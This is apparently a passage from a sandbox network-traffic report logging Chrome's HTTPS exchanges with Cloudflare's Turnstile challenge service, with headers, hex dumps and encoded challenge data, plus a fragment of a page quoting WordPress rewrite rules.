                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC7929INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Typ
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC3887INData Raw: 69 74 65 43 6f 6e 64 20 25 7b 52 45 51 55 45 53 54 5f 46 49 4c 45 4e 41 4d 45 7d 20 21 2d 64 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 52 65 77 72 69 74 65 52 75 6c 65 20 2e 20 2f 69 6e 64 65 78 2e 70 68 70 20 5b 4c 5d 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 26 6c 74 3b 2f 49 66 4d 6f 64 75 6c 65 26 67 74 3b 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 23 20 45 6e 64 20 57 6f 72 64 50 72 65 73 73 0a 09 09 09 09 09 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 72 20 62 6c 6f 67 20 69 73 20 73 68 6f 77 69 6e 67 20 74 68 65 20 77 72 6f 6e 67 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 6e 20 6c 69 6e 6b 73 2c 20 72 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 61 6e 6f 74 68 65
                                                                                                                                                                                                                                  Data Ascii: iteCond %{REQUEST_FILENAME} !-d<br>RewriteRule . /index.php [L]<br>&lt;/IfModule&gt;<br># End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to anothe


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  12192.168.2.1649722104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 3241
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:52 UTC3241OUTData Raw: 76 5f 38 66 34 31 38 64 36 38 39 61 64 64 33 32 63 61 3d 6c 6e 78 68 61 68 35 68 72 68 4a 68 62 68 44 54 38 73 54 38 47 6d 2d 47 2d 7a 6b 46 2d 6b 38 2d 6d 34 7a 77 2d 72 34 38 37 54 38 34 77 4c 38 71 70 68 77 49 5a 47 70 49 61 63 6e 2d 51 38 4e 6d 35 77 38 65 35 68 38 39 30 38 6b 31 58 38 46 53 6d 38 7a 78 63 68 37 70 38 58 68 35 61 53 38 62 54 49 35 34 38 48 68 2d 39 38 71 58 69 4d 65 38 6b 53 39 31 6f 41 63 68 4d 77 53 34 69 6c 30 72 31 6f 30 38 37 78 2d 4b 38 2d 78 34 38 72 5a 63 41 4a 5a 49 38 50 47 6c 39 36 38 4b 70 34 37 59 44 6f 47 59 5a 74 77 4e 4c 4c 67 68 38 65 38 61 24 70 38 4d 39 25 32 62 48 38 2d 41 38 6b 61 7a 6b 2d 56 24 67 68 68 46 48 58 56 74 38 63 78 38 73 6d 2d 6c 38 34 76 37 38 6b 70 38 67 50 4c 6f 68 56 61 38 5a 56 6d 37 65 38 39 6f
                                                                                                                                                                                                                                  Data Ascii: v_8f418d689add32ca=lnxhah5hrhJhbhDT8sT8Gm-G-zkF-k8-m4zw-r487T84wL8qphwIZGpIacn-Q8Nm5w8e5h8908k1X8FSm8zxch7p8Xh5aS8bTI548Hh-98qXiMe8kS91oAchMwS4il0r1o087x-K8-x48rZcAJZI8PGl968Kp47YDoGYZtwNLLgh8e8a$p8M9%2bH8-A8kazk-V$ghhFHXVt8cx8sm-l84v78kp8gPLohVa8ZVm7e89o
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:52 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 149568
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-gen: e1nmATvVyOqO8MI4ZiL6dpy6b/PnfNyZO0xJMD1b34004/HA+682phuwLGnfD+m6+yroIDQRF/u6z27HanJohfAycjqvAzL7Zupaj2PIrRGxP3IDkXbESvfeNgHJ9xAKGGevN2+sUaS5jFT5ADwvxP5z5I3Sb0O+3yph3qlq5NWXLzP28MG2lHYhUiypfhK7MBCF1JglDvXWojHS1QL3hteyAe4oodAefEXPkNcj2IWMRW5ANDUWqhl9WIAVzhA0RAcb9hcRkVrfywPyowG78+DIWOQb2wjx4OmLhfpLSiESG+M5cyTIv7cxadoyCJLPg4+sZi72htrpsc0aNt733hUeHTz2rQrVAIyuXlEQVtALSyYAWmJEFAb6LJNEoNaWIugKrB6nIRqKWruFD6ts5IkUeqWO/Mr3KvZWkpVVxBQAyFiNl+k7A+DzVodCP2x6ake91JR3oQUoYBgTdD/KOfrwdfWiLHyyQASJ7pHvjunZxyg=$qn0fzGzNSIw8pizJ
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d8239854245-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC622INData Raw: 62 56 53 48 5a 48 5a 36 61 56 53 49 6c 5a 4e 77 67 71 47 67 6a 71 4f 68 63 33 69 72 6c 5a 52 66 65 57 57 76 6a 49 71 30 66 4a 53 50 67 35 43 6e 64 59 69 70 64 5a 78 32 72 6e 4f 59 74 62 61 7a 68 48 39 36 6e 34 57 4a 6d 36 48 45 6f 4b 37 49 6a 70 4b 2b 7a 73 4b 6c 77 38 32 36 6b 39 69 39 73 5a 65 72 34 74 75 33 73 37 44 6a 34 63 61 62 36 64 58 64 74 75 6e 47 33 64 4c 65 38 39 54 70 7a 4f 69 33 37 64 44 73 79 4c 58 50 38 4f 48 53 33 65 4b 36 39 66 51 48 30 4f 54 64 2f 50 37 6e 7a 75 2f 38 43 2b 7a 4c 44 65 63 47 44 67 54 57 43 68 4c 36 38 52 76 64 32 77 4c 77 41 2f 51 54 35 42 4c 34 35 64 7a 39 2b 41 48 71 4c 75 66 2b 48 78 2f 75 2f 69 73 4a 44 78 49 77 48 66 6b 5a 50 2f 73 74 49 44 77 5a 4f 44 49 44 49 69 59 4b 49 6b 73 68 42 68 35 4b 43 42 78 4f 4c 44 49
                                                                                                                                                                                                                                  Data Ascii: bVSHZHZ6aVSIlZNwgqGgjqOhc3irlZRfeWWvjIq0fJSPg5CndYipdZx2rnOYtbazhH96n4WJm6HEoK7IjpK+zsKlw826k9i9sZer4tu3s7Dj4cab6dXdtunG3dLe89TpzOi37dDsyLXP8OHS3eK69fQH0OTd/P7nzu/8C+zLDecGDgTWChL68Rvd2wLwA/QT5BL45dz9+AHqLuf+Hx/u/isJDxIwHfkZP/stIDwZODIDIiYKIkshBh5KCBxOLDI
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 42 72 56 43 4e 74 61 47 67 72 53 57 35 68 64 55 6f 70 54 56 52 35 55 6b 74 75 54 6a 74 57 53 6f 46 55 63 45 46 35 66 6a 39 6d 58 6d 78 46 54 59 56 77 66 6e 6c 7a 59 49 46 71 63 70 4b 59 64 31 57 53 65 46 31 63 6b 6e 4a 76 6b 49 52 67 6e 48 57 59 6e 6e 79 70 68 49 68 31 6e 49 53 72 73 6d 79 4a 63 70 56 2f 63 6f 47 6f 6f 36 32 70 69 49 32 4f 69 33 69 36 6a 37 79 57 70 5a 35 2b 77 63 72 49 68 35 37 47 68 6f 2b 4c 77 63 76 44 72 4c 62 44 31 73 4b 5a 78 4a 69 31 79 4e 71 7a 75 4d 71 79 30 5a 66 53 73 72 54 46 76 71 50 48 33 37 6e 43 7a 37 33 52 38 36 62 68 77 37 44 76 35 76 4f 79 39 72 50 56 37 38 72 72 38 75 50 50 78 41 66 7a 35 2b 4c 39 33 2b 4c 48 78 67 6a 6f 38 66 50 72 43 4e 58 52 35 52 51 48 30 41 37 58 32 74 63 67 2f 76 73 57 38 39 72 6b 33 2f 76 61 46
                                                                                                                                                                                                                                  Data Ascii: BrVCNtaGgrSW5hdUopTVR5UktuTjtWSoFUcEF5fj9mXmxFTYVwfnlzYIFqcpKYd1WSeF1cknJvkIRgnHWYnnyphIh1nISrsmyJcpV/coGoo62piI2Oi3i6j7yWpZ5+wcrIh57Gho+LwcvDrLbD1sKZxJi1yNqzuMqy0ZfSsrTFvqPH37nCz73R86bhw7Dv5vOy9rPV78rr8uPPxAfz5+L93+LHxgjo8fPrCNXR5RQH0A7X2tcg/vsW89rk3/vaF
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 61 5a 7a 42 42 5a 44 4a 69 63 6d 6b 30 5a 55 59 38 66 6d 64 71 58 48 42 78 65 7a 64 41 51 46 6c 6e 68 55 4a 67 53 47 4e 2f 67 47 79 50 55 45 70 55 54 46 2b 58 54 33 56 34 63 46 61 4f 6a 49 42 71 59 4a 57 51 6c 48 47 62 6c 49 4a 38 5a 6e 32 4e 72 5a 39 34 6b 70 4f 74 66 6e 47 6d 6f 34 36 74 73 59 4f 30 75 70 68 38 6a 4b 46 2f 6e 35 75 6a 6b 59 43 6d 6c 73 69 43 75 34 6d 6f 79 49 7a 53 30 4d 36 31 76 71 2b 6c 32 4a 58 59 72 5a 75 6c 6b 4d 2b 35 6d 4e 32 31 6e 2b 53 30 31 62 44 57 76 38 79 69 71 75 36 6e 36 65 6a 49 37 4f 58 54 30 66 48 67 7a 50 6a 76 32 4d 62 62 37 65 33 69 30 4e 2f 32 31 4c 33 53 32 76 50 41 38 38 58 69 78 50 37 64 33 68 48 63 37 2b 7a 72 46 63 37 57 42 50 49 5a 38 52 73 67 48 42 73 54 2f 53 4c 6a 45 2b 49 6d 4a 42 38 69 4a 75 6e 39 37 66
                                                                                                                                                                                                                                  Data Ascii: aZzBBZDJicmk0ZUY8fmdqXHBxezdAQFlnhUJgSGN/gGyPUEpUTF+XT3V4cFaOjIBqYJWQlHGblIJ8Zn2NrZ94kpOtfnGmo46tsYO0uph8jKF/n5ujkYCmlsiCu4moyIzS0M61vq+l2JXYrZulkM+5mN21n+S01bDWv8yiqu6n6ejI7OXT0fHgzPjv2Mbb7e3i0N/21L3S2vPA88XixP7d3hHc7+zrFc7WBPIZ8RsgHBsT/SLjE+ImJB8iJun97f
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 51 6a 42 7a 55 6a 49 7a 53 44 6c 4a 56 31 35 30 63 46 74 46 58 33 51 37 61 30 5a 59 68 6e 79 45 67 56 39 6c 53 59 65 4a 6c 47 36 4d 61 6c 56 58 68 49 39 6f 6b 58 53 43 59 61 43 56 58 31 2b 41 65 70 57 65 70 35 2b 63 70 49 4f 70 71 61 43 62 63 36 61 44 69 71 71 52 69 5a 78 34 75 35 57 33 65 5a 75 37 67 49 43 61 68 70 37 41 6e 38 4b 30 68 63 50 4b 78 4d 61 64 77 71 61 4e 30 61 6a 54 77 35 47 53 77 36 6a 59 32 62 61 36 79 35 53 36 76 72 44 6e 75 38 6d 30 32 2b 6e 5a 76 39 33 4f 75 63 37 74 78 73 4c 41 38 4f 37 4d 30 2f 76 31 30 4d 33 6d 79 76 6a 64 2b 39 2f 37 33 74 6b 41 41 50 76 54 2b 39 6a 71 34 42 48 76 79 51 4c 6c 42 50 48 51 43 51 59 45 47 39 6e 62 47 68 6a 6f 36 75 48 71 41 77 4d 47 42 39 38 59 46 41 77 56 2f 68 34 48 49 51 30 52 41 78 55 64 4c 44 49
                                                                                                                                                                                                                                  Data Ascii: QjBzUjIzSDlJV150cFtFX3Q7a0ZYhnyEgV9lSYeJlG6MalVXhI9okXSCYaCVX1+AepWep5+cpIOpqaCbc6aDiqqRiZx4u5W3eZu7gICahp7An8K0hcPKxMadwqaN0ajTw5GSw6jY2ba6y5S6vrDnu8m02+nZv93Ouc7txsLA8O7M0/v10M3myvjd+9/73tkAAPvT+9jq4BHvyQLlBPHQCQYEG9nbGhjo6uHqAwMGB98YFAwV/h4HIQ0RAxUdLDI
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 6c 4e 7a 50 6e 39 43 67 6d 4e 31 62 33 5a 70 58 6e 52 55 61 33 68 47 61 56 70 38 63 6d 56 65 6c 31 61 4f 69 34 78 6e 63 6c 56 56 62 70 4f 4c 65 46 32 6b 6e 35 52 79 64 4a 4e 67 6b 32 61 62 6e 32 74 39 66 36 42 38 69 58 2b 55 68 48 61 45 70 6e 6d 73 70 70 47 2b 6b 4c 43 74 6d 72 69 4e 66 4a 53 39 76 49 47 6d 70 35 6a 4b 6f 72 6a 44 6e 39 54 4f 79 73 47 6d 73 72 43 51 72 39 57 32 32 71 66 50 6e 39 4f 30 7a 4c 7a 4f 30 61 66 64 6f 72 6e 4c 74 62 7a 6c 32 64 2b 72 32 39 37 4b 34 38 50 34 36 62 61 74 78 63 75 35 2f 64 6e 35 76 41 54 69 33 4e 50 2b 39 74 2f 7a 43 4e 37 47 35 65 41 50 32 66 76 79 7a 64 54 65 31 63 6f 4b 38 52 77 47 48 39 55 57 37 69 49 68 45 77 33 58 33 2f 34 54 36 53 62 68 41 41 6f 68 35 77 62 39 38 43 59 54 49 77 51 48 46 50 4d 49 45 66 59 70
                                                                                                                                                                                                                                  Data Ascii: lNzPn9CgmN1b3ZpXnRUa3hGaVp8cmVel1aOi4xnclVVbpOLeF2kn5RydJNgk2abn2t9f6B8iX+UhHaEpnmsppG+kLCtmriNfJS9vIGmp5jKorjDn9TOysGmsrCQr9W22qfPn9O0zLzO0afdornLtbzl2d+r297K48P46batxcu5/dn5vATi3NP+9t/zCN7G5eAP2fvyzdTe1coK8RwGH9UW7iIhEw3X3/4T6SbhAAoh5wb98CYTIwQHFPMIEfYp
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 70 64 63 30 55 37 58 48 70 74 69 31 78 71 6b 56 43 54 61 4a 4e 6c 63 33 53 45 55 56 70 38 56 70 4b 51 6d 48 74 59 63 33 5a 37 6d 6c 2b 43 66 59 65 5a 72 4a 6d 6a 68 32 2b 65 70 71 56 71 6f 6d 39 79 63 71 53 69 68 70 79 52 76 4a 4b 63 69 6e 70 35 65 5a 32 31 6b 72 43 59 66 37 4f 57 6e 6e 2b 75 73 4d 66 53 78 63 61 78 6a 36 69 6e 79 5a 47 53 6b 73 79 38 76 35 7a 52 6e 72 53 35 6d 74 53 35 78 4f 6a 59 79 61 47 6f 71 4b 76 4e 76 73 72 6f 36 4c 2b 75 38 4c 58 4c 2b 64 72 6b 7a 63 66 73 36 75 6d 2b 76 51 58 79 76 64 76 43 39 75 6e 58 78 76 76 74 2f 73 37 36 79 38 2f 63 41 2f 51 48 35 41 6e 6f 34 77 59 4d 37 42 34 68 44 68 73 69 34 52 54 30 4a 69 6b 57 48 2f 50 6e 47 69 4d 42 2b 78 38 6f 41 4f 55 66 4c 42 45 43 44 6a 6f 76 2b 66 6b 47 4e 52 45 42 4c 77 73 5a 51
                                                                                                                                                                                                                                  Data Ascii: pdc0U7XHpti1xqkVCTaJNlc3SEUVp8VpKQmHtYc3Z7ml+CfYeZrJmjh2+epqVqom9ycqSihpyRvJKcinp5eZ21krCYf7OWnn+usMfSxcaxj6inyZGSksy8v5zRnrS5mtS5xOjYyaGoqKvNvsro6L+u8LXL+drkzcfs6um+vQXyvdvC9unXxvvt/s76y8/cA/QH5Ano4wYM7B4hDhsi4RT0JikWH/PnGiMB+x8oAOUfLBECDjov+fkGNREBLwsZQ
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 4c 58 56 5a 67 58 57 64 6f 6b 32 68 4c 66 6d 4f 59 62 5a 57 50 5a 5a 4a 76 61 70 75 50 6b 6c 35 7a 65 4b 65 6f 71 61 56 69 64 6f 42 73 6e 71 61 4d 69 70 43 75 6e 62 61 55 68 70 69 76 63 34 79 58 65 35 74 33 6c 4c 37 43 6d 62 6a 43 76 34 43 33 77 4a 50 47 6f 34 76 42 69 36 66 49 77 4d 75 63 78 36 4b 56 7a 73 61 5a 73 4b 58 61 76 64 65 64 7a 64 2f 66 6f 64 58 46 6f 4b 47 78 77 61 66 71 37 4f 4b 2f 33 65 57 2f 36 65 58 43 76 37 50 75 73 38 7a 33 37 39 33 72 37 64 6a 32 7a 67 54 32 76 37 6a 65 34 73 48 42 42 39 54 73 41 38 72 47 44 51 6f 4d 45 75 6e 4e 43 2f 6b 55 46 4f 58 6b 39 51 41 42 47 66 62 55 41 69 59 55 34 50 59 65 2f 53 58 34 35 53 66 36 2b 4f 73 41 48 52 48 73 42 41 4d 52 43 44 58 7a 4f 44 37 38 44 69 67 37 49 67 45 53 2f 68 59 58 50 67 63 2f 46 7a
                                                                                                                                                                                                                                  Data Ascii: LXVZgXWdok2hLfmOYbZWPZZJvapuPkl5zeKeoqaVidoBsnqaMipCunbaUhpivc4yXe5t3lL7CmbjCv4C3wJPGo4vBi6fIwMucx6KVzsaZsKXavdedzd/fodXFoKGxwafq7OK/3eW/6eXCv7Pus8z3793r7dj2zgT2v7je4sHBB9TsA8rGDQoMEunNC/kUFOXk9QABGfbUAiYU4PYe/SX45Sf6+OsAHRHsBAMRCDXzOD78Dig7IgES/hYXPgc/Fz
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 66 70 57 55 64 47 71 45 65 47 78 6b 65 35 42 57 6a 48 36 55 58 6c 57 6b 6e 6e 4f 59 63 58 75 54 69 4a 2b 6e 6d 61 69 4f 68 71 2b 49 69 71 4a 76 68 4c 65 42 69 72 65 78 73 36 31 37 65 36 6d 55 6d 62 4f 33 70 49 53 5a 74 4b 4b 6d 71 73 4f 65 78 72 43 4c 77 39 44 4b 76 70 4b 58 73 37 50 61 78 4a 6d 33 7a 5a 65 35 76 64 72 53 6d 2b 4b 39 32 75 58 65 70 4c 57 37 72 4c 37 5a 32 39 2f 78 7a 73 72 45 74 4f 6a 34 37 63 4c 47 37 38 62 32 76 37 37 79 33 4e 76 35 39 74 2f 48 33 65 6b 46 33 67 48 37 45 4f 62 47 7a 38 33 46 79 38 66 67 43 67 66 57 31 39 72 62 48 68 6b 50 37 66 63 67 47 52 55 68 45 2b 2f 34 34 51 45 6f 35 51 41 67 2f 42 77 66 4c 79 77 70 44 2b 6a 7a 38 2b 38 73 39 66 49 37 4e 52 48 2b 39 78 62 38 2b 6b 4d 66 48 68 51 42 50 67 59 58 49 44 6f 78 42 77 35
                                                                                                                                                                                                                                  Data Ascii: fpWUdGqEeGxke5BWjH6UXlWknnOYcXuTiJ+nmaiOhq+IiqJvhLeBirexs617e6mUmbO3pISZtKKmqsOexrCLw9DKvpKXs7PaxJm3zZe5vdrSm+K92uXepLW7rL7Z29/xzsrEtOj47cLG78b2v77y3Nv59t/H3ekF3gH7EObGz83Fy8fgCgfW19rbHhkP7fcgGRUhE+/44QEo5QAg/BwfLywpD+jz8+8s9fI7NRH+9xb8+kMfHhQBPgYXIDoxBw5
                                                                                                                                                                                                                                  2024-12-18 19:27:53 UTC1369INData Raw: 4a 64 6b 69 33 31 6e 6f 4a 43 62 6b 48 61 61 6b 59 4e 36 66 6f 4e 33 61 61 43 4a 6d 59 32 67 67 59 75 79 6f 36 74 76 66 36 4f 77 75 6f 4f 48 6c 72 32 6f 75 59 43 51 74 70 46 39 67 4c 58 4a 77 6f 6d 39 79 6f 32 6c 77 35 69 5a 7a 4a 36 55 6f 4d 69 33 70 61 32 34 71 64 65 61 76 70 33 42 6d 37 75 65 31 63 54 64 35 73 57 34 36 61 76 57 76 4e 79 6c 35 38 33 48 34 2f 54 56 34 73 33 69 74 4d 7a 48 36 2b 66 2b 79 66 48 33 75 39 6e 75 76 39 6a 46 42 2b 6e 55 31 66 66 74 2f 63 6b 41 35 51 48 6d 43 77 4c 7a 36 75 37 7a 35 39 6b 52 2b 51 72 39 45 66 48 37 49 78 51 63 33 2b 38 55 49 53 76 7a 39 77 63 75 47 53 72 77 41 53 63 43 37 66 41 6d 4f 6a 50 35 4c 6a 76 39 46 68 30 4b 47 42 73 61 44 69 45 6a 4b 42 59 65 4b 52 70 49 43 79 38 4f 4d 67 77 73 44 30 59 31 54 6c 63 32
                                                                                                                                                                                                                                  Data Ascii: Jdki31noJCbkHaakYN6foN3aaCJmY2ggYuyo6tvf6OwuoOHlr2ouYCQtpF9gLXJwom9yo2lw5iZzJ6UoMi3pa24qdeavp3Bm7ue1cTd5sW46avWvNyl583H4/TV4s3itMzH6+f+yfH3u9nuv9jFB+nU1fft/ckA5QHmCwLz6u7z59kR+Qr9EfH7IxQc3+8UISvz9wcuGSrwAScC7fAmOjP5Ljv9Fh0KGBsaDiEjKBYeKRpICy8OMgwsD0Y1Tlc2


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  13192.168.2.1649723104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:54 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:55 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:55 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-out: o7nDe2/MLcayTFcolB0Xb7m9PoxSA/jfneU=$pYLi/upbVV0MU0c+
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d91ae0b8c8f-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  14192.168.2.1649724104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:55 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f418d689add32ca/1734550072811/ws77LC-Zvt6wd3o HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:55 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:55 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d93082c7c96-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 3a 08 02 00 00 00 e9 e8 34 79 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR:4yIDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  15192.168.2.1649725104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
